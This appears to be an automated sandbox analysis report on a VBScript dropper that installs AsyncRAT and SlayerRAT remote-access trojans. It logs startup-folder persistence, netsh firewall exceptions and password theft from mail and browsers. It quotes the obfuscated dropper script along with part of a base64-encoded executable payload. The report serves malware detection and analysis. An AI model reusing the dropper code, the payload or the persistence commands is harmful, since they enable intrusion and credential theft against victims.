Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source:	Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe	Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep(5000)Dim shadow,devpoint,members,ramadanDim ShaDevset hfhejotgbhzlzyohafchtul = createobject("wscript.shell")ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%TEMP%")Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")Set members=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")shadow.dataType="bin.base64"members.dataType="bin.base64"'--------------------------------shadow.text="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAE4FhmAAAAAAAAAAAOAAAgELAQgAAAgBAAAGAAAAAAAATiYBAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPQlAQBXAAAAAEABAAAEAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVAYBAAAgAAAACAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAQAEAAAQAAAAKAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGABAAACAAAADgEAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwJgEAAAAAAEgAAAACAAUA3LwAABhpAAABAAAAWQAABiS8AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACYCKAEAAAoAACoAACoAAigFAAAKAAAqANJzBwAACoABAAAEcwgAAAqAAgAABHMJAAAKgAMAAARzCgAACoAEAAAEcwsAAAqABQAABAAqAAAAEzABABAAAAABAAARAH4BAAAEbwwAAAoKKwAGKhMwAQAQAAAAAgAAEQB+AgAABG8NAAAKCisABioTMAEAEAAAAAMAABEAfgMAAARvDgAACgorAAYqEzABABAAAAAEAAARAH4EAAAEbw8AAAoKKwAGKhMwAQAQAAAABQAAEQB+BQAABG8QAAAKCisABiobMAQAFAEAAAYAABEAAowGAAAbLBIPAP4WBgAAG28VAAAKLQMWKwEXABMEEQQ55gAAAH4GAAAEFP4BFv4BEwURBSwzfgYAAATQBgAAGygWAAAKbxcAAAoTBhEGLBZyAQAAcBaNEwAAASgYAAAKcxkAAAp6ACsLAHMaAAAKgAYAAAQAfgYAAATQBgAAGygWAAAKFG8bAAAKAAAoAQAAKwrefd5ydQ8AAAElLQQmFisWJQwoHQAACghvHgAAChT+ARb+ARb+A/4RJnI7AABwF40TAAABDQkWCG8eAAAKbx8AAAqiAAkoGAAACgsHCG8eAAAKcyAAAAp6KCEAAAreFwB+BgAABNAGAAAbKBYAAApvIgAACgDcACsFAAIKKwEABioBHAAAAQCNAAq7ADeXAAAAAgCNAGXyABcAAAAAEzACAB8AAAAHAAARAAP+FgYAABtvIwAACgADEgD+FQYAABsGgQYAABsAKgAqAAIoJAAACgAAKgATMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBQAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBgAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAIAAAAAwAABEAAowGAAAbFP4BCwcsCigBAAArCisIKwUAAgorAQAGKhMwAgASAAAABwAAEQADEgD+FQYAABsGgQYAABsAKgAAKgACKCQAAAoAACoAEzACACYAAAANAAARAH4rAAAKjAgAABsU/gELBywKKAIAACuAKwAACn4rAAAKCisABioAACoAAigkAAAKAAAqADJzNgAABoAJAAAEACoAAAAmAigkAAAKAAAqAAATMAIAtQMAAA4AABEAcnEAAHAoLQAAChMTFhMSKxQRExESmgoGby4AAAoAERIX1hMSABESEROOt/4EEzYRNi3ecoEAAHAoLQAAChMVFhMUKxYRFREUmhMKEQpvLgAACgARFBfWExQAERQRFY63/gQTNhE2LdxykwAAcCgtAAAKExcWExYrFhEXERaaEwsRC28uAAAKABEWF9YTFgARFhEXjrf+BBM2ETYt3HKnAABwKC0AAAoTGRYTGCsWERkRGJoTDBEMby4AAAoAERgX1hMYABEYERmOt/4EEzYRNi3ccrsAAHAoLQAAChMbFhMaKxYRGxEamhMNEQ1vLgAACgARGhfWExoAERoRG463/gQTNhE2LdxyzQAAcCgtAAAKEx0WExwrFhEdERyaEw4RDm8uAAAKABEcF9YTHAARHBEdjrf+BBM2ETYt3HLhAABwKC0AAAoT

.NET source code contains potential unpacker

Show sources

Source: Tmp.exe.0.dr, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: servieda.exe.1.dr, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_00085021 push cs; ret
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E2A66 push 0000003Eh; retn 0000h
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E4122 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E2F81 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E7196 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00910712 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00910712 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008EBA9D push eax; ret
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008EBA9D push eax; ret
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102A16B push cs; retf
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102A083 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102A0F7 push cs; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00411879 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_004118A0 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_004118A0 push eax; ret

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	File created: C:\Users\user\AppData\Roaming\servieda.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\servieda.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\pgr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\servieda.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\pgr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
